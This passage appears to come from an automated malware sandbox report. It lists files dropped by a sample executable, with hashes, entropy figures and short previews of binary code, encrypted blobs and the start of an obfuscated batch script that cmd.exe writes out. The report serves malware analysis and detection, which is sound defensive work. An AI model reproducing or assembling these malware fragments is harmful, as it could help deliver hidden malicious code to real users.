                                                      Preview:.HHtLHt*H.. ...............Q.t$ .....D$...................V...Qh.....t$ ....I................D$ V.t$ h.....0....I...h.I.;.u..t$..t$..1....j.Z9.4xL........$xL.......D$...t#.L$ .@.;A..M.u..D$........u...;G4t.B;.4xL.~..T........uJ..tF.$xL.V............P.......P.......P.......P.1....I.V.w4hi....t$ ....I..E.%.....E........D$.......L$...y.V.t$.......L$...T.I..E..@t.j..t$.......L$...T.I..E..L$.... t...0.D$..d$..t...0..t............t........."..................<.t..L$ .........;.t....uK..t.V.t$.V....I....t$..|$..t"j.V....I..|$..u.......@t.j.V..T.I.j.W.t$(......D$._^..]...U.....e...E.P.E...wL.P.u..8.....u.3..3....M...xL.SV.u.....M.W...E..$xL........I..8.....tk.......HHt,Ht,...t.Ht....t....u8............+....&....!...j.......t.j.........j.h....S......PVj.S....I..E..u....t5Vj.S....I..M..E..$xL.............u.Vj.h6...S....I..E........M.<.t....;.....t.j.S....I...j.WQ..........<.t.<.t....t.j'3.PPPPP.7....I.3.9E...._^[..]...U......H..$..wL.VWP.D$.P.u..........i....L$...xL.....L$..8.$xL..|$...
                                                      Process:C:\Users\user\Desktop\f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):46080
                                                      Entropy (8bit):6.795215911093249
                                                      Encrypted:false
                                                      SSDEEP:768:zv/awuUw1Q37iehoxQeU3ecejLixwghYEYP3iSRWG7iksc7nj3:L/awuUwU7KxQefixl2vqWWGlH7
                                                      MD5:65A6CBA668287FAD67B070B2A7C78009
                                                      SHA1:DFB887A60E23D90F34073BF033A48DF6099E5DC2
                                                      SHA-256:E5C33C2470544A877BEC7857167B2B70BE721E659593C76E95DC282B9464D3BA
                                                      SHA-512:A23FDD168CE3CADF920F7CD04806A6BE82070EBF2A99617628A6B0C7672C6AEDB6E73BAC3BE10E87C841D8C8BA15F6813D26590841516E56A64F0D5B7EC61D05
                                                      Malicious:false
                                                      Preview:SV.u.3.W.=.aL...j .M..M.X.....f9.t......at/..rt#..wt............e...3..F...........................3.A...f.........E..................S......tv.. .........tRHtC...t-...t....u.9E........E.......................@........@.....E............u................t.}..uh.E....... .b..TtP...t;Ht+...t................u9...@...7..u-B.......*..u B...@..........u..........E...t.3..........f.........E.........j X.....f9.t.j.Vht.I............{...j ...X.....f9.t.f.>=..a......f9.t.j.h|.I.V../.......u...........@j.h..I.V./.......u...........!j.h..I.V./......................j X.....f9.t.3.f9.......h.....u..E.S.u.P.-}..............E....QL.3.H....H..H..M..x..H._^[..]............SVW.T$..D$..L$.URPQQhp.C.d.5.....P.L.3.D$.d.%.....D$0.X..L$,3..p....t;.T$4...t.;.v..4v.\.....H..{..u.h.....C..}........C...}...d........._^[.L$..A..........t3.D$..H.3....U.h..p..p..p..>......].D$..T$.........U.L$..).q..q..q(........]...UVWS..3.3.3.3.3...[_^]....j...}..3.3.3.3.3...U..SVWj.Rh..C.Q..._^[].U.l$.RQ.t
                                                      Process:C:\Users\user\Desktop\f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):17408
                                                      Entropy (8bit):6.534316746694321
                                                      Encrypted:false
                                                      SSDEEP:384:C64gikvq6LzykagepHIgiwXMxMWkvQFmY4Uv0F6SkXDylnffltltZZzz11ppz9Ks:jvq6LqgaHbdMNkNDUPSdKs
                                                      MD5:B4563E737E66F4BB0DD7C1B8EB654E31
                                                      SHA1:5D93E4416BD1AAD2FDDF3145F788121BF892E44A
                                                      SHA-256:F3309821492F8B24285497DC90391EBEABFB0B6C20AFAA411A73245E43C8060D
                                                      SHA-512:5BF58D45827E6B6A064100A8EA396615838F4ACD482EBFDD77F93CBF57EF87863428133C72679DC46ED93895CB3EE61C919A4242AEAE62720435D4B2E9F0634C
                                                      Malicious:false
                                                      Preview:u.<=.P..W..?>.#.4.<....Xq.?...B..J=.._D...?m..K..F=......?...s7.E=.@..[-.?K>..d.:=...g..?Z}.=\uI=..s.~Q.?.g:"(.N=...'..?9.~.$O1=.....q.?.n.1..%=.p)k...?v.....=.`.X:..?.q.W.. =.Pi....?g...>.M=....[..?.a...M=..._.3.?.,.uXO=.`./..?...1w<=..>'eH.?`...J.J=..x.~..? ....&=..n.`Y.?.....C=.0.....?..].../=..# .g.?.u.P..=.......?...,l.C=..5..q.?.....=.@D...?...-[.@=.pt.4z.? ..pnJ=....l..?.i..Eg.<..y~.?.?.O..^'=.(T.t..?...x;.;=...P...?.R..R.F=...&...?X....N=..J..@.?..~....=.Ht=c..?Az...U"=...nB..?U_.l.j7=...]...?q....BD=.. .h<.?z.).t.'=..Z.#z.?...0.L=.@5....S.OO..F............D..0......=..n... .W9!..?..j.>..0.."..... .I...Q.n0...Hn&.E.....:..E7D...5....7.A.....%@..@....*...Z+A...S..T..rJ...D..@........NT?...w3.k.r.1..9....]...F.K.m.8...C!`..1y2.Y...@.....*..(<j.......V..C..D..p...,.1....n........2.=l..7..0...I.O....x*....l@..2..>.FE...O.5i....4.Q!...?:....C....+..p.X....xO,.C...."..A...ri<...q~._..R. v.=...=.~......o6..@m.P... ...d+...>.
                                                      Process:C:\Users\user\Desktop\f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):36864
                                                      Entropy (8bit):6.487709437776097
                                                      Encrypted:false
                                                      SSDEEP:768:2Gwr9FTqvRYZLjNGj0toimJOt2A4MnWLGHzoif+eXNjRWRgRr0A:XUtq5YdzhtD4RLGki26nWRgRH
                                                      MD5:0511A6F95B7289E49B8694A3E9A01F61
                                                      SHA1:97C7FB18CC8975598CA185AB558BE1A3716C0B28
                                                      SHA-256:E56FC1F69E1845A7CEE63BE4F646E06382716B87B264BBDA18A97ACE8CB980FD
                                                      SHA-512:177EFF6A346CEFB8A4DE4B43791686EC823CBD58D19C727BA60E82F37A37B098DF1CF1C64D5D71DA02D8EA5EEF329B35AD2D211E5242FD4DEAA86E53DB9E79E8
                                                      Malicious:false
                                                      Preview:_^3.[..]...V..~..u h..K.....I.....t.h..K.P....I..F.3.9F.^....U.....M.SVW......u..u...|.I..}.j.^.'.9u.s..u..M..W....E..M.V+.P.E.P.....d.K..M....E....M..........t.V.M..T....(.L..x4.t........p.K..M.................K..M.................K..M.................K..M.................K..M.......uo...K..M.......u^. .K..M.......uB.D.K..M.......u1.P.K..M..x.....u..h.K..M..g.....u.3..7.E........*.E..........E..........E..........E..........M....._^..[..]...U...(...SV...E.....3.E.PQQQ.E...P.......].PQV....I.=..................E.M.QPj.......PV....I..........M........u.......I.........3.M.].].............t.S.].M.SPV........PV....I..]..uG9E.t..u.....I.3..E......E.PQQQ.E.P......PQV....I.=.....E...K.....^[..].}..t..u.....I.2...U..M.SVW.....M......M.....3..L,I..}..r[W.M.....j\^f90uJj..M.....f90u;j.W.M......S.M..B.......u..u..M..E.VWP......F.PW.M.........M..7...S.M..RB.......u..u..M..E.VWP.....E..M.+.HP.F.P.E.P.....M.S.R....M......_^[]...U....S.].VW....h..I..7...U..z..v..J....
                                                      Process:C:\Users\user\Desktop\f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):34816
                                                      Entropy (8bit):5.91643423291841
                                                      Encrypted:false
                                                      SSDEEP:384:CLfTN319stEjFKr+/hdvE6HDyOpbM136KeBzC6GFe46JRoGWbHkdzfkfiC2:eTN3Efr8qcDP8WBosd0bHazf0+
                                                      MD5:FA80F56CFF6EF734F277E80AD4D96892
                                                      SHA1:B5662A5B0C87E322AB580884BFEC59FD8EED0C45
                                                      SHA-256:5A8A6897A39FC8EAC46C8AAD92216ED660CF924A4B23CD6EB546F1586DB622E1
                                                      SHA-512:C6332303EA8174489D2A2DED6171EEEF8234927E878050153C31C1ED63BF7497C827FC84EE21A2AE73BABF236C860D2F17F6153085A3333B9BD5EAE9C8BCFA8A
                                                      Malicious:false
                                                      Preview:............e.n.d.s.t.r.u.c.t...........b.y.t.e.....................u.b.y.t.e...................b.o.o.l.e.a.n...............c.h.a.r.....................w.c.h.a.r............... ...s.h.o.r.t...................u.s.h.o.r.t.................d.w.o.r.d...................w.o.r.d.....................l.o.n.g.....................u.l.o.n.g...................i.n.t.......................b.o.o.l.....................u.i.n.t.....................i.n.t.6.4...................u.i.n.t.6.4.................p.t.r...................@...h.w.n.d.................@...h.a.n.d.l.e.............@...f.l.o.a.t...................d.o.u.b.l.e.................i.n.t._.p.t.r...............u.i.n.t._.p.t.r.............l.o.n.g._.p.t.r.............u.l.o.n.g._.p.t.r...........d.w.o.r.d._.p.t.r...........l.r.e.s.u.l.t...............l.p.a.r.a.m.................w.p.a.r.a.m.....................................................................................................................................................H...............
                                                      Process:C:\Users\user\Desktop\f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):27648
                                                      Entropy (8bit):6.520901473786754
                                                      Encrypted:false
                                                      SSDEEP:768:qevkuKa5GCJ5YxtXazSTvHZ9ijrUTSu7YeI:jvpKa5Gk6/vij4NI
                                                      MD5:F630CE50A0EE2C5B6B0B8F30EDF5D4D0
                                                      SHA1:BD36C9BA492F315F2B1BB70749E97E3362AA59E5
                                                      SHA-256:AF06FF34F6BBF6A7549BAADE6E109EA4174F51EC8C41DF3240AEA50A8C59BBDC
                                                      SHA-512:DA23DB331DC9677BCBB372324F63DA017CD7583DAFB9AF66DD280202978DD069BAE36CDE452BDAB02F846498EB7068CF74D7C507D8A4A39C4FF9D3F18544A4BA
                                                      Malicious:false
                                                      Preview:.wL..m........a..3..`...E...a........P...PSV.....ua..WV.....ia..Q......P...PWV......Qa........P...PSV.!...:a.......PW...PV.....$a........P...PV.N.....a.......P...PSV.T.....`..WSV.u.Q......`..WSV.Z.....`..QQSV.>....`........t I...`..Q.....S.P...PQV.....`.......S.P...PV.....`..j......S.P...PV......t`....d.I.WSh....V..rL.....I..V`..SV......J`..WSV.u.Q.....9`..WSV.u.Q.{....(`..WSV.u.Q.;.....`..S.[..R..Y..u.M..ga..h......Q..Y.x..x..8.F....b..8.......nc..SV....I..ac...E.+E.f.......He...E.+E.f........d...E..........c...U..c...E.........~c...}..vc..j...X.I.+..}..qc...E...+E..+...+.f.......M...d....+E..E...E...}.+E..E.f........c...E...+E..+...+.f.......M...c....+E..E...E...}..U.+E...f........c..f........c..f..t.f+.....f+}.f.}.f.}.f........c..+}.f+.....f.}.f.}.f.......c..f.......c..f..t.f+.....f+u.f..f.u.f.......c..f+.....f+u.f..f.u.f.......jc.....u!.}..t..A`.E..AX.}...."d...Ad.E....E....t..AX.E.......d...A\..c...w...H.I..g...&d..HH...d..WV..wL..p....qd...~8.t..v8....I..f8..~
                                                      Process:C:\Users\user\Desktop\f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):11264
                                                      Entropy (8bit):5.431609536479688
                                                      Encrypted:false
                                                      SSDEEP:96:G7w7by0Sx0azZt76j6AhaseyHWKVPKO0dDmQypkGSSYpXd+CuMj6:Gw7by90az37nAjeytFGSk9vpN+CVj6
                                                      MD5:126DDDDC42F610B4224CE6F472F22C25
                                                      SHA1:2C296D5446356F03E94F9580F13C780C030DA772
                                                      SHA-256:9347F3F9304095B0CEE98C8B68C7D6B1F0784A642E480E9F0CFB8FFC12272149
                                                      SHA-512:8194F83237F586265769B921A4D45BD87E296A80A43EADD6428E229EFD52B5F28762BA1BA54A9495C93B34A172DBBFE1AF57FD3396C9CA5399E8B170466BB8B2
                                                      Malicious:false
                                                      Preview:..h../.../--.2....zz...o.X..'o0...l..2........../....d.L....wg.....D.]DF.M8wBK...]i...WO.dln.U.V..;...0.:2...g~U....5....z..T.$"_...0........!..........z.|...Gv...K7..7..R*...4...7.D"....?Dd..I......{..L......"...|..|&...|.P.;..n..nc......d2Y. .#......H$.i.......q7....h.......:K.=...;....<wt....;...T.O...8"...<..".S....n....:/.1...3,..<K.hk...H'O..k.......'..kK.@...".+......V7.vq...M1...Y.6Bg..G.vqb_7.P...I.....!.H8...7.\..T.?.....>.b.L./.7/_..t..w$......(.91.@g.m..6.....O..._.....fw..o...Z...,......~m..../U.. R..>.......N4Lq...W...$..K...+,..].m..m......Rf.H.Zy.H?.x+/..d|....[.=..'.uspg.q...BU..a..i........|>hY.q..-.y.h.M.R...\......E,.c.f.i..z.|.....Q.u...KU....g..+.X...E..4b.Xq~~.e.4.HD".17..6.~.]=...=.0o.X`6....A...B:.....vw.j(....t..Y..r2.t-..z$~ii..0...~...(oH.6...f..va.7o.^.x...h.......n...]...B/....I&....e#<.\.g.?.....t5.u}..Je..Z.....S.x..F..g.....^F......f...."......OS..@6...S.o.Hw#....UN^....Yr+...4....Z8.+..]t5h...N...|&.H4....qii
                                                      Process:C:\Users\user\Desktop\f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):173056
                                                      Entropy (8bit):7.999027920177228
                                                      Encrypted:true
                                                      SSDEEP:3072:PhtSNtfussrOOtsSvFKHnDMN4Whu4qbjj78D5/1ZOybvEfpcKIok:PhwNtfuvrOOtXSDMN4Gu4a78DMyHRR
                                                      MD5:E394FDAE1CA91C8F2103216BDFDAD76D
                                                      SHA1:CDC935FFE768BAC6BC4F4EE783DB706BBB056310
                                                      SHA-256:DB3F77ECAE8D01BAC5E5183F19E9FD132BE72189F8CAF087BDDD8F865E75007A
                                                      SHA-512:57D5B8D769451CA2835F909A8C93A6E454AA0E5A3EE6E0866EFCAAA0C161D689EE44AF0372B0C81ECF351C4B4A5EB2080D9BD9FA98D63B62C676C82B594E6860
                                                      Malicious:false
                                                      Preview:G.....Pf._....IG.-..M"...c-.*.g...9Y../v........L.L...p....#|.S...[K.?6.^.^9.1Uo.I.0.....RLr.R.X.(.Y...N...6.....3.#.<!.....].Y...C../....P..G...U.q..h......T..9F.Jk..>..V/..T.g20.b.X....W.o..|.7K....r."....QP+_...Q..6....J.H.W..I.YH...o......C...'.8.}......u9vpI.x....z.No...(.MC.0..5l>...uR.eV...E3\k.V....1OF.yaB....{...&.:....R;N(.J.j-. =..BC...3..fZ*24....4.s_>...6.YNf....?..8.:b...].iR...E.0n...>..~......K..8.i..............D..e...uw...y....sH..PLos7.e...C...P.<<....!....ql.C..k;...o........6..i.VM...L..\.|.'..wf$..g...*_.5.<.H.._.."U....d. ....N...!1.&7?5d.(_]s.m.veI..d.rv.Z.N...N..#aj.M...a.a2.9(.q._.\..].G.K!..p.Io...F..s...y.&.1x.C.S.mgi.h@.R.....v....\..l..[......Q-..G3....m"....7.........|..!m.{..(......9.....$3v...:....yV...6.s'EA.*.x......xGCI.|.(...Wx....wJ.}..n.3g.....W^...0...k...?.....J.U..I!D...y.Z5tc..)~....pk'Q.`<VC.........X.l..W..^.}.$?:...>~.#..,...2b.\.|C...2m...w?8.u.....\5.....g..!..o......+.]..9e(......./?...
                                                      Process:C:\Users\user\Desktop\f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):101376
                                                      Entropy (8bit):7.998105942614346
                                                      Encrypted:true
                                                      SSDEEP:3072:G8o6VD5NLr6cDwvn6xRqUDVvvLFGCup2ZEe4zMrBVW1Z/4W:ZoU5NicDwk17w2F+MrBVW1Z/
                                                      MD5:4C207EC57889C9FBEAC5C0179D46C5FF
                                                      SHA1:D0D6B5EA5AA524F27F69278BCFCB298A9F629BBB
                                                      SHA-256:819748D605F0E5C5DAA9767AFCD7A1D207E722845F10AB5D521098EC5A1C16ED
                                                      SHA-512:5062ABFD0A2D879F93A674F05FF84A18FD8B575E7A83FE3C40FFDFB450D70F49ED49E6EC3428D1F94F872F6B2118A7503E18280C64E7C17F5DD1AF34C343A63D
                                                      Malicious:false
                                                      Preview:.l.!...%.w..2....8N...R.$.6i..P.Ia.#.p..!....{..1kOu.J.y&E..L..P'....0.D.....pi-;U.....,....b.........>....EZ?..h...]....X..Ux..!.6p.u....7..y..MqA.K).=..K.......sU.E..#W..<...}..y38......,...p.N......g]..D..|.g....7....".[G4db....-0....:...f.Vaa.%.'........E.d9..Id..b....x.....5.y....~.[Dri.S...E.).?h..f...+/...T..>...r....{tw+J.E.Q.2..K..w.p.j}._..5..x.!....~8N..*.J.-...k.1.Z.....$b....=..C.y......8I2..+0.,%V.)..x.B).S..b..~...F.z?..s=.k_.....P.IMAg...U..^^-...#lE...]..qw.......?{F..O%......K....5.Q%.hJ%C.-.u`...*[....?...I...MD.*.(...U.LC.L.....o.Q.8.../.....I.....{.....;....s."....9..5..b..R}....b...^.#,..l/A..TLc.-.I. |...L..(RA1.Y.......|...x.$......Q.-..p.~.pOx8&.A.S.....d..l.4g2p.5o...u.hI.VX......}../.t.7.....G{.i....:0...f...TqJ3.....f..8.6...........B...s.d...I.G.B.~..N:d..>.. ....q...7C;K.!.qe.z1...pL.2'...)...ZD....%...@....aL!.9.m..............qX.:...D.^.J.,q!..p.M.^..-. .....:......2..%...zo..T..M........NG.,...3.5."_...
                                                      Process:C:\Users\user\Desktop\f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):34816
                                                      Entropy (8bit):4.73242588916427
                                                      Encrypted:false
                                                      SSDEEP:384:rHwwuBcEZbvlF2c/mwftIQXoSpu88888888888888888888888888888zv88888b:kwuNbCc/mexy
                                                      MD5:FE3A797ACBABEFD2ED0244D027615D2D
                                                      SHA1:C9BB626F9EAF5BE917DF9E48DC17E2FBEBE2980C
                                                      SHA-256:79EAE5E45C5942DE4853145477F43DF6CD36B865BE1716216DB41C9396934989
                                                      SHA-512:C6DB3F7A3DA15B15A1A1382CA4058666629769C58965B7A8E6420A270E8799309D8EF78A6BFF4FE4D880AEB20B0117AF2084A90292DEBBD580D253F78FCC6DB8
                                                      Malicious:false
                                                      Preview:....V...............................................................#...............................F.......B.......).......).......................u.......u.......;.......;.......*.......*.......*...........(...................,.......,.......i.......g.......g.......m...............P.......P.......P.......w.......w.......w.......s.......s.......A.......A.......A.......G.......G.......a.......`.......................................W.......W.......W.......t.......t.......o.......o.......o.......o.......o.......M.......M.......R.......R.......Q.......Q.......x.......x.......x.......X...............].......].......].......].......].......].......T.......T.......T.......T.......T.......d.......d......._......._......._......._......._.......n.......n.......n.......c.......c.......c.......c.......c......./.......k.......k.......k.......k.......l.......l.......l.......l.......j.......j.......j.......j.......{.......{.......{.......{.......{.......{.......z.......z.......z.......z.......z...
                                                      Process:C:\Users\user\Desktop\f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):67584
                                                      Entropy (8bit):6.670130028111029
                                                      Encrypted:false
                                                      SSDEEP:1536:JyZpQ4VMEPmfP/b/psgrO4aK9iwcznrQfy0c4cDTOelOFCOBSljvj5Piur:6Q6ClAMfA4lelIJBSLPJ
                                                      MD5:F9ADFA382B306ED67E00C640548FDA5E
                                                      SHA1:6DCDCA313F1E07A24E6FF777287293859A3C19CF
                                                      SHA-256:F792A5027114336B1C4AB82AC96D5375E3E93F47974DFAA4F2A3543DFF4EF1BD
                                                      SHA-512:113E37D0001E1E009354698FFB8BC0B02CD79C73EDDD7CCEB33A8FB00BECE84A7A41AAAEA6BE9DA91DB0EC9EBC71594DBAC0FB6C2CCEE57CEA647007AF54DA3C
                                                      Malicious:false
                                                      Preview:.U..Bt...Ot.3.........U....~.....3...........E............3..M.......S.3.......U....U.M.E..=..H...........H+.......U.....gJ.....gJ..E..M..u..E......M...3....}...u.u..].t9.E.%....=....u'.u..........%.........u..........E.].E...H.......}...}.tI...vD..............KK......%....y.H..@.U......M.hJ..M...$?J...E..E.........w..F@..<8.E..}..}...}..E.....................E.;F|...6.........E...%.....M.=.....E.u'....e.....%.....e...E.......E.E.....E..u.;u.u....o...M.;M.M....o...E.9}.~..C....E.|;;F|...5.....9M.M.M...mo...u.;u.u...^o...E....E.9}.~.E.;}....k.......;...}....U.......;}.}i.E.....;F|..........M...%....=....u!..A.......%......................E.9U.t.9U.t...AG...M.;}.|..E..U..M.....j..;....i...}..E...@..P.u.V.u..u...g.........hi..f.G..........}.f#......f;.u.....}.;}.w..i.........t.;.....v..Fh.............S....n...;}.}H;F|s....9U.t89U.t3...G.E.;}.|..%.......t.;.....v..Fh..................U..... j..;....h...}..E...@..P.u.V.u..u...g..........h......}.;}.u...h...}...}
                                                      Process:C:\Users\user\Desktop\f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):8192
                                                      Entropy (8bit):6.382094684013103
                                                      Encrypted:false
                                                      SSDEEP:192:Iqk80rqISieg1KIeQ+URBtnAZoGRTv6mHp:4rHr1beQ+IBtnAewp
                                                      MD5:E96912F328FFF8D58EDA28EC99CF7049
                                                      SHA1:B267AA41FC6DBBA924292A116F467A9E05BC02A8
                                                      SHA-256:45E3D5A2459E7B19A92D53402C2C285806BD02C6C904E1491E373CCDAED9E32C
                                                      SHA-512:4EC3F9D969BB8A394306FFD3D7B9E1F5A85E2E09DA2CC5C0DBDEC1C2BAC306AC2F474E57A3AA135DB4D471885A5A74423740702A32B7E5FB80408651CC3EB509
                                                      Malicious:false
                                                      Preview:$..t$.....YG.D$..YC..z~..........M..Y....O.3.Q..FVS.\$......d$4..D$,j.VPS.|$<.t$H.<.......L$ . ...;.|e.\$HS.L$<.i..P.L$$...Vj..D$(P.t$..........L$ .....L$8..k..F...;.~....T$4...H........H...j.j..,....L$..k.._^3.[..]...U.......Fj..SVWj.......I....E..@..8.......O....E..A..E.A..E..A..M..E......h....3.......PWWWWW.u.....I..M...t.......P.......h..I.......Wj..H.........M...j..V....I._^3.[..]...U.......i..SVWj.......I....E..@..8...<....O....E..A..E.A..E..A..M..E........3.......WWWWWh....P.u.....I..M...t.......P.J.....h..I..>.....Wj..H........M..Ej..V....I._^3.[..]...U........h..SVWj.......I....E..@..8......O....E.A..E..A..E.A..M.E....J...3..E.WWWWPh..........P.u.....I...t(.u.......h(.K.P....M..........P.}......M.h..I..n.....Wj..H.........M..ui..V....I._^3.[..]...U...$SVWj..M.....I..]...h..I.... ....}.3.@.E.9G.v..G..H.....E....|....~.3.@.E..G..8......O.hL.K....E.A..E..A..E.A..M.E....]f...}..O....W.....t&h..K..M...e...G..8...4....w..M...c...!.M.......E.P.M..c..
                                                      Process:C:\Users\user\Desktop\f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exe
                                                      File Type:ASCII text, with very long lines (1660), with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):30161
                                                      Entropy (8bit):5.039653634843272
                                                      Encrypted:false
                                                      SSDEEP:768:giaDx5AAOvXWhmOAr60/0nQzvfrkpFBzvSdDjJDLqLfyz3juJ:giaqemDJ0n8pDlDLyVJ
                                                      MD5:FB2A985578B86B57CEBC716791812DB1
                                                      SHA1:A5BE9AB55482062644BCF6912C6D0835807EFAB2
                                                      SHA-256:7711D13B3785BF007531FC9B3BF6725312FB56B412108A85FF0E53EF5BCCB970
                                                      SHA-512:04622ACEB9763B17698A6FFBBDD4179B20F8010AD0E08F9715C6BAB045438C103B0B932CC75F4F4A4DCE38C3B1F4C86F206BCDF99327F6677F6BC15FF34F90A5
                                                      Malicious:false
                                                      Preview:Set Argue=B..oqQLBlue Electrical Brian ..DqGYBroken Graham Michael Paul Louisville Votes Spin Virgin Caps ..WJsEssex Buddy Reads ..wOTelevisions Kenya Bloomberg Scholar Annie Hottest Latin ..xSQFathers From Hack ..sBBiTcp Disco ..DNYPSteady Weekend Nv Constructed Currencies Dans Tile ..Set Interact=d..BsCPrimarily Calibration Generous Access Voted Toolbar Device ..AAGAccepts Dam Examined Coverage Drive ..KLCConstruct Blogging Breast Cas Landscapes Handy Jack Alternate ..QHiDConducting Retailer Aberdeen Thanksgiving Hs Instance ..yDNPoint Cemetery Passport ..rHContained Ships Tv Dryer Texture Sluts Having Statements ..nAQQPhase Photoshop Aircraft Lit Introduces Sheer Edward Bedding ..tBaSmithsonian Disco Solely Sister Transparency Coast Situations Upload Returns ..VTpmMall Worked Nelson Reprints Understood Forward ..mGNirvana Solving Margaret British Gps Sprint Representations ..Set Luis=Z..EtIPayments Zimbabwe Trinidad Thumb Unit Breeding ..fdKHudson Kinase Santa Homework Maximum ..Olu
                                                      Process:C:\Windows\SysWOW64\cmd.exe
                                                      File Type:ASCII text, with very long lines (1660), with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):30161
                                                      Entropy (8bit):5.039653634843272
                                                      Encrypted:false
                                                      SSDEEP:768:giaDx5AAOvXWhmOAr60/0nQzvfrkpFBzvSdDjJDLqLfyz3juJ:giaqemDJ0n8pDlDLyVJ
                                                      MD5:FB2A985578B86B57CEBC716791812DB1
                                                      SHA1:A5BE9AB55482062644BCF6912C6D0835807EFAB2
                                                      SHA-256:7711D13B3785BF007531FC9B3BF6725312FB56B412108A85FF0E53EF5BCCB970
                                                      SHA-512:04622ACEB9763B17698A6FFBBDD4179B20F8010AD0E08F9715C6BAB045438C103B0B932CC75F4F4A4DCE38C3B1F4C86F206BCDF99327F6677F6BC15FF34F90A5
                                                      Malicious:false
                                                      Preview:Set Argue=B..oqQLBlue Electrical Brian ..DqGYBroken Graham Michael Paul Louisville Votes Spin Virgin Caps ..WJsEssex Buddy Reads ..wOTelevisions Kenya Bloomberg Scholar Annie Hottest Latin ..xSQFathers From Hack ..sBBiTcp Disco ..DNYPSteady Weekend Nv Constructed Currencies Dans Tile ..Set Interact=d..BsCPrimarily Calibration Generous Access Voted Toolbar Device ..AAGAccepts Dam Examined Coverage Drive ..KLCConstruct Blogging Breast Cas Landscapes Handy Jack Alternate ..QHiDConducting Retailer Aberdeen Thanksgiving Hs Instance ..yDNPoint Cemetery Passport ..rHContained Ships Tv Dryer Texture Sluts Having Statements ..nAQQPhase Photoshop Aircraft Lit Introduces Sheer Edward Bedding ..tBaSmithsonian Disco Solely Sister Transparency Coast Situations Upload Returns ..VTpmMall Worked Nelson Reprints Understood Forward ..mGNirvana Solving Margaret British Gps Sprint Representations ..Set Luis=Z..EtIPayments Zimbabwe Trinidad Thumb Unit Breeding ..fdKHudson Kinase Santa Homework Maximum ..Olu
                                                      Process:C:\Users\user\Desktop\f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):24576
                                                      Entropy (8bit):6.537933632294137
                                                      Encrypted:false
                                                      SSDEEP:384:0UYk1dx59ib+Pk8cdPptVWtiHUZiSkd28M1AD+FrhnTUR5ApVdbhY9TngaVS/o7P:4k1dxvhc8cdPpLWtrJADK1c+d9Y9Tnzj
                                                      MD5:73F054A2261B87A73BD58B21EEADEE7E
                                                      SHA1:7DABC6A6BD05A2CF9468288457F9A9351C6C2A7A
                                                      SHA-256:55B72B50292E9DF2B1CAB6793AA675EF01173421E3FD54EE287C30147F5030B1
                                                      SHA-512:2FCB3693FC20AE8986EA6323025C13329CFEB6F99C0E771E1F3CFE4DBFEC3D65C3436AC6D01A65FC610576E63F4C58CE329F2C6BF0A1B14FAA8CBA89019CF952
                                                      Malicious:false
                                                      Preview:P.H....Y{....U.........}........I3........J...f9p..u.u...........Ht#Ht.H......Hu.K..u...I.E...M.M...u.8].u..A.3..E...E.....f9H.u..8.u...j..U.Y...E...P.E.PR.............U..M..E.@....f.x..u.....0......E...E.."...C......E.@......@.Pjr.<.}..t&.E...t..E.P..\....D....}...E.u..E.....E.j.......h............M..E....M..=..._^[..]...U.......S3.VW...E.3.E.A.E.E...L..}.M..u!....L.h..I....L....h..C..y..Y.u..]....C.A.....3.f9B.u7.....t"HHt.Ht...B.Pj......j.Z.A.....3.B....B...Pjn.b....U..=..L...U.u.j.Z....u.B.U..K...j3_.E........f9x..}...i.....R.E......M.Q..P.E........4...j.j...D...P.......w........D....M.P.c..j..M..^.....C.....M..0..a...E..x.L.P.E.P.e....E...u4j..u..E.h.L.P.....E..x.L.P.E.P.9....E.....|....E...u.h....P.u......M..e.......C.jN...Yf9H.u3.E..P..D...P.E.PVS..............M...u..M..E.P.....M....C....f.x.A.......B..S........z..}..}..t.VS.........jNYf9J.uq.M..y..t H...E.P..D...PQVS..._............u....6S..............M..~.3...D....}.j...D.....P.u.VS.=.....
                                                      Process:C:\Users\user\Desktop\f3ba41ba0b508b0965153c1688d6df6de6b3fdf59b015.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):58368
                                                      Entropy (8bit):6.508641630500009
                                                      Encrypted:false
                                                      SSDEEP:768:SqEJNdGYjd8nT+S6kiT3T/QqoWBY5WK9ivg0XWYETGVrPhISqAbwGpKZrLlmPEpc:SqqdGYynTDYL7Q+mr9R2VgjGpS2E2
                                                      MD5:CC76A8A37725B387C366314CB13A0BB0
                                                      SHA1:2E2E3DF2C56077DBCDE949D33C222B3261A00678
                                                      SHA-256:0EFC2C99DA5DD20A2D4CF5244AA1F936982DD20600822B8AD22E7462F8F22BD9
                                                      SHA-512:C2EEA8A859C07DBCC2F81E3571FEB6B7B03E7DA9D74EE69C90A22A88268A1AB867C9FFB2C5C799C8C8F979E7D9F4C3673700248024ADEAE3148631A5537C8C89
                                                      Malicious:false
